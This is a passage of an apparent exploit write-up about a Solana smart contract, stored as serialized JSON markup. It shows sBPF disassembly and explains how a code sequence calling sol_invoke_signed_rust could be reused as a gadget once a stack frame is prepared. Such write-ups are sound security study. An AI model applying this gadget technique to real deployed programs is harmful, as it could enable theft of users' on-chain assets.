r4",{"type":25,"tag":216,"props":48207,"children":48208},{"style":6964},[48209],{"type":31,"value":48104},{"type":25,"tag":216,"props":48211,"children":48212},{"style":6947},[48213],{"type":31,"value":48109},{"type":25,"tag":216,"props":48215,"children":48216},{"style":6953},[48217],{"type":31,"value":8276},{"type":25,"tag":216,"props":48219,"children":48220},{"style":6989},[48221],{"type":31,"value":748},{"type":25,"tag":216,"props":48223,"children":48224},{"style":6964},[48225],{"type":31,"value":48123},{"type":25,"tag":216,"props":48227,"children":48228},{"style":6947},[48229],{"type":31,"value":48230},"var_98",{"type":25,"tag":216,"props":48232,"children":48233},{"style":6964},[48234],{"type":31,"value":7874},{"type":25,"tag":216,"props":48236,"children":48237},{"class":6922,"line":7110},[48238,48243,48248,48252,48257,48261,48265,48269,48274,48278,48283],{"type":25,"tag":216,"props":48239,"children":48240},{"style":6947},[48241],{"type":31,"value":48242},"100001bc0",{"type":25,"tag":216,"props":48244,"children":48245},{"style":6947},[48246],{"type":31,"value":48247},"  79a570ff00000000",{"type":25,"tag":216,"props":48249,"children":48250},{"style":6947},[48251],{"type":31,"value":48094},{"type":25,"tag":216,"props":48253,"children":48254},{"style":6947},[48255],{"type":31,"value":48256}," r5",{"type":25,"tag":216,"props":48258,"children":48259},{"style":6964},[48260],{"type":31,"value":48104},{"type":25,"tag":216,"props":48262,"children":48263},{"style":6947},[48264],{"type":31,"value":48109},{"type":25,"tag":216,"props":48266,"children":48267},{"style":6953},[48268],{"type":31,"value":8276},{"type":25,"tag":216,"props":48270,"children":48271},{"style":6989},[48272],{"type":31,"value":48273},"144",{"type":25,"tag":216,"props":48275,"children":48276},{"style":6964},[48277],{"type":31,"value":48123},{"type":25,"tag":216,"props":48279,"children":48280},{"style":6947},[48281],{"type":31,"value":48282},"var_90",{"type":25,"tag":216,"props":48284,"children":48285},{"style":6964},[48286],{"type":31,"value":7874},{"type":25,"tag":216,"props":48288,"children":48289},{"class":6922,"line":7216},[48290,48295,48300,48305],{"type":25,"tag":216,"props":48291,"children":48292},{"style":6947},[48293],{"type":31,"value":48294},"100001bc8",{"type":25,"tag":216,"props":48296,"children":48297},{"style":6989},[48298],{"type":31,"value":48299},"  8520000020100000",{"type":25,"tag":216,"props":48301,"children":48302},{"style":6947},[48303],{"type":31,"value":48304},"   call",{"type":25,"tag":216,"props":48306,"children":48307},{"style":6947},[48308],{"type":31,"value":48309}," sol_invoke_signed_rust\n",{"type":25,"tag":216,"props":48311,"children":48312},{"class":6922,"line":7244},[48313,48318,48323,48328,48332,48336,48340,48344,48349,48353],{"type":25,"tag":216,"props":48314,"children":48315},{"style":6947},[48316],{"type":31,"value":48317},"100001bd0",{"type":25,"tag":216,"props":48319,"children":48320},{"style":6989},[48321],{"type":31,"value":48322},"  5500040000000000",{"type":25,"tag":216,"props":48324,"children":48325},{"style":6947},[48326],{"type":31,"value":48327},"   jne",{"type":25,"tag":216,"props":48329,"children":48330},{"style":6964},[48331],{"type":31,"value":12672},{"type":25,"tag":216,"props":48333,"children":48334},{"style":6953},[48335],{"type":31,"value":3539},{"type":25,"tag":216,"props":48337,"children":48338},{"style":6989},[48339],{"type":31,"value":21486},{"type":25,"tag":216,"props":48341,"children":48342},{"style":6964},[48343],{"type":31,"value":9772},{"type":25,"tag":216,"props":48345,"children":48346},{"style":6947},[48347],{"type":31,"value":48348},"r0",{"type":25,"tag":216,"props":48350,"children":48351},{"style":6964},[48352],{"type":31,"value":7026},{"type":25,"tag":216,"props":48354,"children":48355},{"style":6989},[48356],{"type":31,"value":48357},"0x0\n",{"type":25,"tag":216,"props":48359,"children":48360},{"class":6922,"line":7257},[48361],{"type":25,"tag":216,"props":48362,"children":48363},{"emptyLinePlaceholder":16},[48364],{"type":31,"value":7642},{"type":25,"tag":216,"props":48366,"children":48367},{"class":6922,"line":7275},[48368,48373,48378,48383,48388,48392],{"type":25,"tag":216,"props":48369,"children":48370},{"style":6947},[48371],{"type":31,"value":48372},"100001bd8",{"type":25,"tag":216,"props":48374,"children":48375},{"style":6947},[48376],{"type":31,"value":48377},"  b701000018000000",{"type":25,"tag":216,"props":48379,"children":48380},{"style":6947},[48381],{"type":31,"value":48382},"   mov",{"type":25,"tag":216,"props":48384,"children":48385},{"style":6947},[48386],{"type":31,"value":48387}," r1",{"type":25,"tag":216,"props":48389,"children":48390},{"style":6964},[48391],{"type":31,"value":7026},{"type":25,"tag":216,"props":48393,"children":48394},{"style":6989},[48395],{"type":31,"value":48396},"0x18\n",{"type":25,"tag":216,"props":48398,"children":48399},{"class":6922,"line":7296},[48400,48405,48410,48414,48418,48422,48426,48430,48435,48439,48444],{"type":25,"tag":216,"props":48401,"children":48402},{"style":6947},[48403],{"type":31,"value":48404},"100001be0",{"type":25,"tag":216,"props":48406,"children":48407},{"style":6947},[48408],{"type":31,"value":48409},"  79a288ff00000000",{"type":25,"tag":216,"props":48411,"children":48412},{"style":6947},[48413],{"type":31,"value":48094},{"type":25,"tag":216,"props":48415,"children":48416},{"style":6947},[48417],{"type":31,"value":48099},{"type":25,"tag":216,"props":48419,"children":48420},{"style":6964},[48421],{"type":31,"value":48104},{"type":25,"tag":216,"props":48423,"children":48424},{"style":6947},[48425],{"type":31,"value":48109},{"type":25,"tag":216,"props":48427,"children":48428},{"style":6953},[48429],{"type":31,"value":8276},{"type":25,"tag":216,"props":48431,"children":48432},{"style":6989},[48433],{"type":31,"value":48434},"120",{"type":25,"tag":216,"props":48436,"children":48437},{"style":6964},[48438],{"type":31,"value":48123},{"type":25,"tag":216,"props":48440,"children":48441},{"style":6947},[48442],{"type":31,"value":48443},"var_78",{"type":25,"tag":216,"props":48445,"children":48446},{"style":6964},[48447],{"type":31,"value":7874},{"type":25,"tag":216,"props":48449,"children":48450},{"class":6922,"line":7305},[48451,48456,48461,48466,48470,48475,48479,48483,48487,48492,48497,48502],{"type":25,"tag":216,"props":48452,"children":48453},{"style":6947},[48454],{"type":31,"value":48455},"100001be8",{"type":25,"tag":216,"props":48457,"children":48458},{"style":6989},[48459],{"type":31,"value":48460},"  6312000000000000",{"type":25,"tag":216,"props":48462,"children":48463},{"style":6947},[48464],{"type":31,"value":48465},"   stxw",{"type":25,"tag":216,"props":48467,"children":48468},{"style":6964},[48469],{"type":31,"value":26978},{"type":25,"tag":216,"props":48471,"children":48472},{"style":6947},[48473],{"type":31,"value":48474},"r2",{"type":25,"tag":216,"props":48476,"children":48477},{"style":6953},[48478],{"type":31,"value":8276},{"type":25,"tag":216,"props":48480,"children":48481},{"style":6989},[48482],{"type":31,"value":1882},{"type":25,"tag":216,"props":48484,"children":48485},{"style":6964},[48486],{"type":31,"value":27006},{"type":25,"tag":216,"props":48488,"children":48489},{"style":6947},[48490],{"type":31,"value":48491},"r1",{"type":25,"tag":216,"props":48493,"children":48494},{"style":6964},[48495],{"type":31,"value":48496},"  {",{"type":25,"tag":216,"props":48498,"children":48499},{"style":6989},[48500],{"type":31,"value":48501},"0x18",{"type":25,"tag":216,"props":48503,"children":48504},{"style":6964},[48505],{"type":31,"value":7874},{"type":25,"tag":216,"props":48507,"children":48508},{"class":6922,"line":7557},[48509,48514,48519,48524,48528,48532,48536],{"type":25,"tag":216,"props":48510,"children":48511},{"style":6947},[48512],{"type":31,"value":48513},"100001bf0",{"type":25,"tag":216,"props":48515,"children":48516},{"style":6989},[48517],{"type":31,"value":48518},"  0500030000000000",{"type":25,"tag":216,"props":48520,"children":48521},{"style":6947},[48522],{"type":31,"value":48523},"   ja",{"type":25,"tag":216,"props":48525,"children":48526},{"style":6964},[48527],{"type":31,"value":12672},{"type":25,"tag":216,"props":48529,"children":48530},{"style":6953},[48531],{"type":31,"value":3539},{"type":25,"tag":216,"props":48533,"children":48534},{"style":6989},[48535],{"type":31,"value":21253},{"type":25,"tag":216,"props":48537,"children":48538},{"style":6964},[48539],{"type":31,"value":9943},{"type":25,"tag":216,"props":48541,"children":48542},{"class":6922,"line":7574},[48543],{"type":25,"tag":216,"props":48544,"children":48545},{"emptyLinePlaceholder":16},[48546],{"type":31,"value":7642},{"type":25,"tag":216,"props":48548,"children":48549},{"class":6922,"line":7591},[48550,48555,48560,48564,48568,48572,48576,48580,48584,48588,48592],{"type":25,"tag":216,"props":48551,"children":48552},{"style":6947},[48553],{"type":31,"value":48554},"100001bf8",{"type":25,"tag":216,"props":48556,"children":48557},{"style":6947},[48558],{"type":31,"value":48559},"  79a188ff00000000",{"type":25,"tag":216,"props":48561,"children":48562},{"style":6947},[48563],{"type":31,"value":48094},{"type":25,"tag":216,"props":48565,"children":48566},{"style":6947},[48567],{"type":31,"value":48387},{"type":25,"tag":216,"props":48569,"children":48570},{"style":6964},[48571],{"type":31,"value":48104},{"type":25,"tag":216,"props":48573,"children":48574},{"style":6947},[48575],{"type":31,"value":48109},{"type":25,"tag":216,"props":48577,"children":48578},{"style":6953},[48579],{"type":31,"value":8276},{"type":25,"tag":216,"props":48581,"children":48582},{"style":6989},[48583],{"type":31,"value":48434},{"type":25,"tag":216,"props":48585,"children":48586},{"style":6964},[48587],{"type":31,"value":48123},{"type":25,"tag":216,"props":48589,"children":48590},{"style":6947},[48591],{"type":31,"value":48443},{"type":25,"tag":216,"props":48593,"children":48594},{"style":6964},[48595],{"type":31,"value":7874},{"type":25,"tag":216,"props":48597,"children":48598},{"class":6922,"line":7604},[48599,48604,48609,48613,48617,48621],{"type":25,"tag":216,"props":48600,"children":48601},{"style":6947},[48602],{"type":31,"value":48603},"100001c00",{"type":25,"tag":216,"props":48605,"children":48606},{"style":6947},[48607],{"type":31,"value":48608},"  bf02000000000000",{"type":25,"tag":216,"props":48610,"children":48611},{"style":6947},[48612],{"type":31,"value":48382},{"type":25,"tag":216,"props":48614,"children":48615},{"style":6947},[48616],{"type":31,"value":48099},{"type":25,"tag":216,"props":48618,"children":48619},{"style":6964},[48620],{"type":31,"value":7026},{"type":25,"tag":216,"props":48622,"children":48623},{"style":6947},[48624],{"type":31,"value":48625},"r0\n",{"type":25,"tag":216,"props":48627,"children":48628},{"class":6922,"line":7613},[48629,48634,48639,48643,48648,48652,48657,48661,48665,48670,48674,48678,48683,48688,48692,48696],{"type":25,"tag":216,"props":48630,"children":48631},{"style":6947},[48632],{"type":31,"value":48633},"100001c08",{"type":25,"tag":216,"props":48635,"children":48636},{"style":6989},[48637],{"type":31,"value":48638},"  8510000075000000",{"type":25,"tag":216,"props":48640,"children":48641},{"style":6947},[48642],{"type":31,"value":48304},{"type":25,"tag":216,"props":48644,"children":48645},{"style":7375},[48646],{"type":31,"value":48647}," _ZN94_",{"type":25,"tag":216,"props":48649,"children":48650},{"style":6953},[48651],{"type":31,"value":14245},{"type":25,"tag":216,"props":48653,"children":48654},{"style":7375},[48655],{"type":31,"value":48656},"LT",{"type":25,"tag":216,"props":48658,"children":48659},{"style":6953},[48660],{"type":31,"value":14245},{"type":25,"tag":216,"props":48662,"children":48663},{"style":6947},[48664],{"type":31,"value":17610},{"type":25,"tag":216,"props":48666,"children":48667},{"style":6953},[48668],{"type":31,"value":48669},"...$",{"type":25,"tag":216,"props":48671,"children":48672},{"style":6947},[48673],{"type":31,"value":11994},{"type":25,"tag":216,"props":48675,"children":48676},{"style":6953},[48677],{"type":31,"value":14245},{"type":25,"tag":216,"props":48679,"children":48680},{"style":7375},[48681],{"type":31,"value":48682},"GT",{"type":25,"tag":216,"props":48684,"children":48685},{"style":6953},[48686],{"type":31,"value":48687},"$$",{"type":25,"tag":216,"props":48689,"children":48690},{"style":7375},[48691],{"type":31,"value":48682},{"type":25,"tag":216,"props":48693,"children":48694},{"style":6953},[48695],{"type":31,"value":14245},{"type":25,"tag":216,"props":48697,"children":48698},{"style":6964},[48699],{"type":31,"value":48700},"4from17ha0d289b72861b06dE\n",{"type":25,"tag":216,"props":48702,"children":48703},{"class":6922,"line":7636},[48704],{"type":25,"tag":216,"props":48705,"children":48706},{"emptyLinePlaceholder":16},[48707],{"type":31,"value":7642},{"type":25,"tag":216,"props":48709,"children":48710},{"class":6922,"line":7645},[48711,48716,48721,48725,48729,48733,48737,48741,48746,48750,48755],{"type":25,"tag":216,"props":48712,"children":48713},{"style":6947},[48714],{"type":31,"value":48715},"100001c10",{"type":25,"tag":216,"props":48717,"children":48718},{"style":6947},[48719],{"type":31,"value":48720},"  79a2b8ff00000000",{"type":25,"tag":216,"props":48722,"children":48723},{"style":6947},[48724],{"type":31,"value":48094},{"type":25,"tag":216,"props":48726,"children":48727},{"style":6947},[48728],{"type":31,"value":48099},{"type":25,"tag":216,"props":48730,"children":48731},{"style":6964},[48732],{"type":31,"value":48104},{"type":25,"tag":216,"props":48734,"children":48735},{"style":6947},[48736],{"type":31,"value":48109},{"type":25,"tag":216,"props":48738,"children":48739},{"style":6953},[48740],{"type":31,"value":8276},{"type":25,"tag":216,"props":48742,"children":48743},{"style":6989},[48744],{"type":31,"value":48745},"72",{"type":25,"tag":216,"props":48747,"children":48748},{"style":6964},[48749],{"type":31,"value":48123},{"type":25,"tag":216,"props":48751,"children":48752},{"style":6947},[48753],{"type":31,"value":48754},"var_48",{"type":25,"tag":216,"props":48756,"children":48757},{"style":6964},[48758],{"type":31,"value":7874},{"type":25,"tag":216,"props":48760,"children":48761},{"class":6922,"line":7654},[48762,48767,48772,48777,48781,48785,48789,48793,48797,48801],{"type":25,"tag":216,"props":48763,"children":48764},{"style":6947},[48765],{"type":31,"value":48766},"100001c18",{"type":25,"tag":216,"props":48768,"children":48769},{"style":6989},[48770],{"type":31,"value":48771},"  1502040000000000",{"type":25,"tag":216,"props":48773,"children":48774},{"style":6947},[48775],{"type":31,"value":48776},"   jeq",{"type":25,"tag":216,"props":48778,"children":48779},{"style":6964},[48780],{"type":31,"value":12672},{"type":25,"tag":216,"props":48782,"children":48783},{"style":6953},[48784],{"type":31,"value":3539},{"type":25,"tag":216,"props":48786,"children":48787},{"style":6989},[48788],{"type":31,"value":21486},{"type":25,"tag":216,"props":48790,"children":48791},{"style":6964},[48792],{"type":31,"value":9772},{"type":25,"tag":216,"props":48794,"children":48795},{"style":6947},[48796],{"type":31,"value":48474},{"type":25,"tag":216,"props":48798,"children":48799},{"style":6964},[48800],{"type":31,"value":7026},{"type":25,"tag":216,"props":48802,"children":48803},{"style":6989},[48804],{"type":31,"value":48357},{"type":25,"tag":216,"props":48806,"children":48807},{"class":6922,"line":7722},[48808],{"type":25,"tag":216,"props":48809,"children":48810},{"emptyLinePlaceholder":16},[48811],{"type":31,"value":7642},{"type":25,"tag":216,"props":48813,"children":48814},{"class":6922,"line":7730},[48815,48820,48825,48830,48834,48838],{"type":25,"tag":216,"props":48816,"children":48817},{"style":6947},[48818],{"type":31,"value":48819},"100001c20",{"type":25,"tag":216,"props":48821,"children":48822},{"style":6989},[48823],{"type":31,"value":48824},"  2702000022000000",{"type":25,"tag":216,"props":48826,"children":48827},{"style":6947},[48828],{"type":31,"value":48829},"   mul",{"type":25,"tag":216,"props":48831,"children":48832},{"style":6947},[48833],{"type":31,"value":48099},{"type":25,"tag":216,"props":48835,"children":48836},{"style":6964},[48837],{"type":31,"value":7026},{"type":25,"tag":216,"props":48839,"children":48840},{"style":6989},[48841],{"type":31,"value":48842},"0x22\n",{"type":25,"tag":216,"props":48844,"children":48845},{"class":6922,"line":7760},[48846,48851,48856,48860,48864,48868,48872,48876,48881,48885,48890],{"type":25,"tag":216,"props":48847,"children":48848},{"style":6947},[48849],{"type":31,"value":48850},"100001c28",{"type":25,"tag":216,"props":48852,"children":48853},{"style":6947},[48854],{"type":31,"value":48855},"  79a1b0ff00000000",{"type":25,"tag":216,"props":48857,"children":48858},{"style":6947},[48859],{"type":31,"value":48094},{"type":25,"tag":216,"props":48861,"children":48862},{"style":6947},[48863],{"type":31,"value":48387},{"type":25,"tag":216,"props":48865,"children":48866},{"style":6964},[48867],{"type":31,"value":48104},{"type":25,"tag":216,"props":48869,"children":48870},{"style":6947},[48871],{"type":31,"value":48109},{"type":25,"tag":216,"props":48873,"children":48874},{"style":6953},[48875],{"type":31,"value":8276},{"type":25,"tag":216,"props":48877,"children":48878},{"style":6989},[48879],{"type":31,"value":48880},"80",{"type":25,"tag":216,"props":48882,"children":48883},{"style":6964},[48884],{"type":31,"value":48123},{"type":25,"tag":216,"props":48886,"children":48887},{"style":6947},[48888],{"type":31,"value":48889},"var_50",{"type":25,"tag":216,"props":48891,"children":48892},{"style":6964},[48893],{"type":31,"value":7874},{"type":25,"tag":216,"props":48895,"children":48896},{"class":6922,"line":7768},[48897,48902,48907,48911,48915,48919],{"type":25,"tag":216,"props":48898,"children":48899},{"style":6947},[48900],{"type":31,"value":48901},"100001c30",{"type":25,"tag":216,"props":48903,"children":48904},{"style":6947},[48905],{"type":31,"value":48906},"  b703000001000000",{"type":25,"tag":216,"props":48908,"children":48909},{"style":6947},[48910],{"type":31,"value":48382},{"type":25,"tag":216,"props":48912,"children":48913},{"style":6947},[48914],{"type":31,"value":48154},{"type":25,"tag":216,"props":48916,"children":48917},{"style":6964},[48918],{"type":31,"value":7026},{"type":25,"tag":216,"props":48920,"children":48921},{"style":6989},[48922],{"type":31,"value":48923},"0x1\n",{"type":25,"tag":216,"props":48925,"children":48926},{"class":6922,"line":7800},[48927,48932,48937,48941],{"type":25,"tag":216,"props":48928,"children":48929},{"style":6947},[48930],{"type":31,"value":48931},"100001c38",{"type":25,"tag":216,"props":48933,"children":48934},{"style":6947},[48935],{"type":31,"value":48936},"  8510000003feffff",{"type":25,"tag":216,"props":48938,"children":48939},{"style":6947},[48940],{"type":31,"value":48304},{"type":25,"tag":216,"props":48942,"children":48943},{"style":6947},[48944],{"type":31,"value":48945}," __rust_dealloc\n",{"type":25,"tag":216,"props":48947,"children":48948},{"class":6922,"line":7808},[48949],{"type":25,"tag":216,"props":48950,"children":48951},{"emptyLinePlaceholder":16},[48952],{"type":31,"value":7642},{"type":25,"tag":216,"props":48954,"children":48955},{"class":6922,"line":7868},[48956,48961,48966,48970,48974,48978,48982,48986,48991,48995,49000],{"type":25,"tag":216,"props":48957,"children":48958},{"style":6947},[48959],{"type":31,"value":48960},"100001c40",{"type":25,"tag":216,"props":48962,"children":48963},{"style":6947},[48964],{"type":31,"value":48965},"  79a2d0ff00000000",{"type":25,"tag":216,"props":48967,"children":48968},{"style":6947},[48969],{"type":31,"value":48094},{"type":25,"tag":216,"props":48971,"children":48972},{"style":6947},[48973],{"type":31,"value":48099},{"type":25,"tag":216,"props":48975,"children":48976},{"style":6964},[48977],{"type":31,"value":48104},{"type":25,"tag":216,"props":48979,"children":48980},{"style":6947},[48981],{"type":31,"value":48109},{"type":25,"tag":216,"props":48983,"children":48984},{"style":6953},[48985],{"type":31,"value":8276},{"type":25,"tag":216,"props":48987,"children":48988},{"style":6989},[48989],{"type":31,"value":48990},"48",{"type":25,"tag":216,"props":48992,"children":48993},{"style":6964},[48994],{"type":31,"value":48123},{"type":25,"tag":216,"props":48996,"children":48997},{"style":6947},[48998],{"type":31,"value":48999},"var_30",{"type":25,"tag":216,"props":49001,"children":49002},{"style":6964},[49003],{"type":31,"value":7874},{"type":25,"tag":216,"props":49005,"children":49006},{"class":6922,"line":13001},[49007,49012,49017,49021,49025,49029,49033,49037,49041,49045],{"type":25,"tag":216,"props":49008,"children":49009},{"style":6947},[49010],{"type":31,"value":49011},"100001c48",{"type":25,"tag":216,"props":49013,"children":49014},{"style":6989},[49015],{"type":31,"value":49016},"  1502030000000000",{"type":25,"tag":216,"props":49018,"children":49019},{"style":6947},[49020],{"type":31,"value":48776},{"type":25,"tag":216,"props":49022,"children":49023},{"style":6964},[49024],{"type":31,"value":12672},{"type":25,"tag":216,"props":49026,"children":49027},{"style":6953},[49028],{"type":31,"value":3539},{"type":25,"tag":216,"props":49030,"children":49031},{"style":6989},[49032],{"type":31,"value":21253},{"type":25,"tag":216,"props":49034,"children":49035},{"style":6964},[49036],{"type":31,"value":9772},{"type":25,"tag":216,"props":49038,"children":49039},{"style":6947},[49040],{"type":31,"value":48474},{"type":25,"tag":216,"props":49042,"children":49043},{"style":6964},[49044],{"type":31,"value":7026},{"type":25,"tag":216,"props":49046,"children":49047},{"style":6989},[49048],{"type":31,"value":48357},{"type":25,"tag":216,"props":49050,"children":49051},{"class":6922,"line":13019},[49052],{"type":25,"tag":216,"props":49053,"children":49054},{"emptyLinePlaceholder":16},[49055],{"type":31,"value":7642},{"type":25,"tag":216,"props":49057,"children":49058},{"class":6922,"line":13064},[49059,49064,49069,49073,49077,49081,49085,49089,49094,49098,49103],{"type":25,"tag":216,"props":49060,"children":49061},{"style":6947},[49062],{"type":31,"value":49063},"100001c50",{"type":25,"tag":216,"props":49065,"children":49066},{"style":6947},[49067],{"type":31,"value":49068},"  79a1c8ff00000000",{"type":25,"tag":216,"props":49070,"children":49071},{"style":6947},[49072],{"type":31,"value":48094},{"type":25,"tag":216,"props":49074,"children":49075},{"style":6947},[49076],{"type":31,"value":48387},{"type":25,"tag":216,"props":49078,"children":49079},{"style":6964},[49080],{"type":31,"value":48104},{"type":25,"tag":216,"props":49082,"children":49083},{"style":6947},[49084],{"type":31,"value":48109},{"type":25,"tag":216,"props":49086,"children":49087},{"style":6953},[49088],{"type":31,"value":8276},{"type":25,"tag":216,"props":49090,"children":49091},{"style":6989},[49092],{"type":31,"value":49093},"56",{"type":25,"tag":216,"props":49095,"children":49096},{"style":6964},[49097],{"type":31,"value":48123},{"type":25,"tag":216,"props":49099,"children":49100},{"style":6947},[49101],{"type":31,"value":49102},"var_38",{"type":25,"tag":216,"props":49104,"children":49105},{"style":6964},[49106],{"type":31,"value":7874},{"type":25,"tag":216,"props":49108,"children":49109},{"class":6922,"line":13170},[49110,49115,49119,49123,49127,49131],{"type":25,"tag":216,"props":49111,"children":49112},{"style":6947},[49113],{"type":31,"value":49114},"100001c58",{"type":25,"tag":216,"props":49116,"children":49117},{"style":6947},[49118],{"type":31,"value":48906},{"type":25,"tag":216,"props":49120,"children":49121},{"style":6947},[49122],{"type":31,"value":48382},{"type":25,"tag":216,"props":49124,"children":49125},{"style":6947},[49126],{"type":31,"value":48154},{"type":25,"tag":216,"props":49128,"children":49129},{"style":6964},[49130],{"type":31,"value":7026},{"type":25,"tag":216,"props":49132,"children":49133},{"style":6989},[49134],{"type":31,"value":48923},{"type":25,"tag":216,"props":49136,"children":49137},{"class":6922,"line":27455},[49138,49143,49148,49152],{"type":25,"tag":216,"props":49139,"children":49140},{"style":6947},[49141],{"type":31,"value":49142},"100001c60",{"type":25,"tag":216,"props":49144,"children":49145},{"style":6947},[49146],{"type":31,"value":49147},"  85100000fefdffff",{"type":25,"tag":216,"props":49149,"children":49150},{"style":6947},[49151],{"type":31,"value":48304},{"type":25,"tag":216,"props":49153,"children":49154},{"style":6947},[49155],{"type":31,"value":48945},{"type":25,"tag":216,"props":49157,"children":49158},{"class":6922,"line":27490},[49159],{"type":25,"tag":216,"props":49160,"children":49161},{"emptyLinePlaceholder":16},[49162],{"type":31,"value":7642},{"type":25,"tag":216,"props":49164,"children":49165},{"class":6922,"line":27498},[49166,49171,49176,49181,49186,49191],{"type":25,"tag":216,"props":49167,"children":49168},{"style":6947},[49169],{"type":31,"value":49170},"100001c68",{"type":25,"tag":216,"props":49172,"children":49173},{"style":6989},[49174],{"type":31,"value":49175},"  9500000000000000",{"type":25,"tag":216,"props":49177,"children":49178},{"style":6947},[49179],{"type":31,"value":49180},"   exit",{"type":25,"tag":216,"props":49182,"children":49183},{"style":6964},[49184],{"type":31,"value":49185}," {",{"type":25,"tag":216,"props":49187,"children":49188},{"style":6947},[49189],{"type":31,"value":49190},"__return_addr",{"type":25,"tag":216,"props":49192,"children":49193},{"style":6964},[49194],{"type":31,"value":7874},{"type":25,"tag":38,"props":49196,"children":49197},{},[49198,49200,49206],{"type":31,"value":49199},"Which, assuming that ",{"type":25,"tag":82,"props":49201,"children":49203},{"className":49202},[],[49204],{"type":31,"value":49205},"sol_invoke_signed_rust",{"type":31,"value":49207}," returns 0, is doing the following:",{"type":25,"tag":6711,"props":49209,"children":49210},{},[49211,49220,49229],{"type":25,"tag":2043,"props":49212,"children":49213},{},[49214],{"type":25,"tag":82,"props":49215,"children":49217},{"className":49216},[],[49218],{"type":31,"value":49219},"sol_invoke_signed_rust(r1, [r10-136], [r10-128], [r10-152], [r10-144])",{"type":25,"tag":2043,"props":49221,"children":49222},{},[49223],{"type":25,"tag":82,"props":49224,"children":49226},{"className":49225},[],[49227],{"type":31,"value":49228},"*[r10-120] = 0x18",{"type":25,"tag":2043,"props":49230,"children":49231},{},[49232,49234,49240,49242,49249],{"type":31,"value":49233},"Calls ",{"type":25,"tag":82,"props":49235,"children":49237},{"className":49236},[],[49238],{"type":31,"value":49239},"__rust_dealloc",{"type":31,"value":49241},", which in default circumstances is a ",{"type":25,"tag":162,"props":49243,"children":49246},{"href":49244,"rel":49245},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/entrypoint.rs#L257C1-L259",[166],[49247],{"type":31,"value":49248},"NOP",{"type":31,"value":179},{"type":25,"tag":38,"props":49251,"children":49252},{},[49253],{"type":31,"value":49254},"r10 is the stack pointer, so it will point to the stack frame of the current depth when executing that instruction.",{"type":25,"tag":38,"props":49256,"children":49257},{},[49258],{"type":31,"value":49259},"If we correctly set up the stack frame used by this gadget with valid parameters, that's a win.",{"type":25,"tag":38,"props":49261,"children":49262},{},[49263,49265,49272],{"type":31,"value":49264},"Looking at the ",{"type":25,"tag":162,"props":49266,"children":49269},{"href":49267,"rel":49268},"https://github.com/solana-labs/solana/blob/master/sdk/program/src/syscalls/definitions.rs#L59",[166],[49270],{"type":31,"value":49271},"definition",{"type":31,"value":49273},", it's not crystal clear what the parameters are:",{"type":25,"tag":206,"props":49275,"children":49277},{"className":6915,"code":49276,"language":6914,"meta":7,"style":7},"fn sol_invoke_signed_rust(instruction_addr: *const u8, account_infos_addr: *const u8, account_infos_len: u64, signers_seeds_addr: *const u8, signers_seeds_len: u64) -> u64\n",[49278],{"type":25,"tag":82,"props":49279,"children":49280},{"__ignoreMap":7},[49281],{"type":25,"tag":216,"props":49282,"children":49283},{"class":6922,"line":6923},[49284,49288,49293,49297,49302,49306,49310,49314,49318,49322,49327,49331,49335,49339,49343,49347,49352,49356,49360,49364,49369,49373,49377,49381,49385,49389,49394,49398,49402,49406,49410],{"type":25,"tag":216,"props":49285,"children":49286},{"style":6936},[49287],{"type":31,"value":24226},{"type":25,"tag":216,"props":49289,"children":49290},{"style":7047},[49291],{"type":31,"value":49292}," sol_invoke_signed_rust",{"type":25,"tag":216,"props":49294,"children":49295},{"style":6964},[49296],{"type":31,"value":1850},{"type":25,"tag":216,"props":49298,"children":49299},{"style":6947},[49300],{"type":31,"value":49301},"instruction_addr",{"type":25,"tag":216,"props":49303,"children":49304},{"style":6953},[49305],{"type":31,"value":1472},{"type":25,"tag":216,"props":49307,"children":49308},{"style":6953},[49309],{"type":31,"value":13773},{"type":25,"tag":216,"props":49311,"children":49312},{"style":6936},[49313],{"type":31,"value":13611},{"type":25,"tag":216,"props":49315,"children":49316},{"style":7375},[49317],{"type":31,"value":18591},{"type":25,"tag":216,"props":49319,"children":49320},{"style":6964},[49321],{"type":31,"value":7026},{"type":25,"tag":216,"props":49323,"children":49324},{"style":6947},[49325],{"type":31,"value":49326},"account_infos_addr",{"type":25,"tag":216,"props":49328,"children":49329},{"style":6953},[49330],{"type":31,"value":1472},{"type":25,"tag":216,"props":49332,"children":49333},{"style":6953},[49334],{"type":31,"value":13773},{"type":25,"tag":216,"props":49336,"children":49337},{"style":6936},[49338],{"type":31,"value":13611},{"type":25,"tag":216,"props":49340,"children":49341},{"style":7375},[49342],{"type":31,"value":18591},{"type":25,"tag":216,"props":49344,"children":49345},{"style":6964},[49346],{"type":31,"value":7026},{"type":25,"tag":216,"props":49348,"children":49349},{"style":6947},[49350],{"type":31,"value":49351},"account_infos_len",{"type":25,"tag":216,"props":49353,"children":49354},{"style":6953},[49355],{"type":31,"value":1472},{"type":25,"tag":216,"props":49357,"children":49358},{"style":7375},[49359],{"type":31,"value":9811},{"type":25,"tag":216,"props":49361,"children":49362},{"style":6964},[49363],{"type":31,"value":7026},{"type":25,"tag":216,"props":49365,"children":49366},{"style":6947},[49367],{"type":31,"value":49368},"signers_seeds_addr",{"type":25,"tag":216,"props":49370,"children":49371},{"style":6953},[49372],{"type":31,"value":1472},{"type":25,"tag":216,"props":49374,"children":49375},{"style":6953},[49376],{"type":31,"value":13773},{"type":25,"tag":216,"props":49378,"children":49379},{"style":6936},[49380],{"type":31,"value":13611},{"type":25,"tag":216,"props":49382,"children":49383},{"style":7375},[49384],{"type":31,"value":18591},{"type":25,"tag":216,"props":49386,"children":49387},{"style":6964},[49388],{"type":31,"value":7026},{"type":25,"tag":216,"props":49390,"children":49391},{"style":6947},[49392],{"type":31,"value":49393},"signers_seeds_len",{"type":25,"tag":216,"props":49395,"children":49396},{"style":6953},[49397],{"type":31,"value":1472},{"type":25,"tag":216,"props":49399,"children":49400},{"style":7375},[49401],{"type":31,"value":9811},{"type":25,"tag":216,"props":49403,"children":49404},{"style":6964},[49405],{"type":31,"value":7036},{"type":25,"tag":216,"props":49407,"children":49408},{"style":6953},[49409],{"type":31,"value":17714},{"type":25,"tag":216,"props":49411,"children":49412},{"style":7375},[49413],{"type":31,"value":17153},{"type":25,"tag":38,"props":49415,"children":49416},{},[49417,49419,49424,49426,49433],{"type":31,"value":49418},"The source of ",{"type":25,"tag":162,"props":49420,"children":49422},{"href":49421},"(https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/program.rs#L289)",[49423],{"type":31,"value":48035},{"type":31,"value":49425}," helps a lot, but looking at the actual 